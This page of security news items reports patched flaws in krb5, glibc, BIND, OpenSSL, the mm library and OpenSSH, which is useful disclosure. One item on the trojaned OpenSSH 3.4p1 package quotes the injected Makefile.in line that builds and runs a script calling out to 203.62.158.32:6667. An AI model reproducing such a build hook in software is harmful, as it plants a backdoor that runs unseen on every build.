Security 10929 Published by Philipp Esselbach 0

Red Hat has released an updated krb5 package which fix a remote buffer overflow:

"The Kerberos 5 network authentication system contains an RPC library which includes an XDR decoder derived from Sun's RPC implementation. The Sun implementation was recently demonstrated to be vulnerable to a heap overflow. It is believed that the attacker needs to be able to authenticate to the kadmin daemon for this attack to be successful. No exploits are known to currently exist."

Download

Security 10929 Published by Philipp Esselbach 0

Security 10929 Published by Philipp Esselbach 0

A glibc update for Debian GNU/Linux has been released:

"An integer overflow bug has been discovered in the RPC library used by GNU libc, which is derived from the SunRPC library. This bug could be exploited to gain unauthorized root access to software linking to this code. The packages below also fix integer overflows in the malloc code. They also contain a fix from Andreas Schwab to reduce linebuflen in parallel to bumping up the buffer pointer in the NSS DNS code.

This problem has been fixed in version 2.1.3-23 for the old stable distribution (potato), in version 2.2.5-11.1 for the current stable distribution (woody) and in version 2.2.5-13 for the unstable distribution (sid).

We recommend that you upgrade your libc6 packages immediately."

Read more

Security 10929 Published by Philipp Esselbach 0

Red Hat Inc. has released a security update for the bind packages in Red Hat Linux:

ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and various tools.

A buffer overflow vulnerability exists in multiple implementations of DNS resolver libraries. Applications that utilize vulnerable DNS resolver
libraries may be affected. A remote attacker who is able to send malicious DNS responses could potentially exploit this vulnerability to execute arbitrary code or cause a denial of service on a vulnerable system.

Read more

Security 10929 Published by Philipp Esselbach 0

It seems like that the OpenSSH package on ftp.openbsd.org was trojaned. Thanks Palos.

"The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net)."

Read more

Security 10929 Published by Philipp Esselbach 0

PkgMaster has released a new OpenSSH package for Cobalt RaQ 3/4 and CacheRaQ4:

- OpenSSH enables you to connect securely (encrypted) to your Sun Cobalt appliance
- Contains both Client and Server software
- Statically compiled agains zlib 1.1.4 and openssl 0.9.6e
- PrivSep enabled for better security
- Compression enabled for better performance

Download

Security 10929 Published by Philipp Esselbach 0

A remotely exploitable buffer overflow has been found in OpenSSL

OpenSSL is a commercial-grade, full-featured, and Open Source toolkit which implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux
SuSE

Security 10929 Published by Philipp Esselbach 0

Marcus Meissner and Sebastian Krahmer discovered a temporary file vulnerability in the mm library which is used by the Apache webserver. This vulnerability can be exploited to obtain root privilege if shell access to the apache user (typically apache or nobody) is already obtained.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux

Security 10929 Published by Philipp Esselbach 0

PkgMaster has released an OpenSSH 3.4p1-4 update for the MIPS based Cobalt RaQ 1/2 server appliances.

This release fix a major security vulnerability:

''At least one major security vulnerability exists in many deployed OpenSSH versions (2.3.1 to 3.3).

The 3.4 release contains many other fixes done over a week long audit started when this issue came to light. We believe that some of those fixes are likely to be important security fixes. Therefore, we urge an upgrade to 3.4.''

Download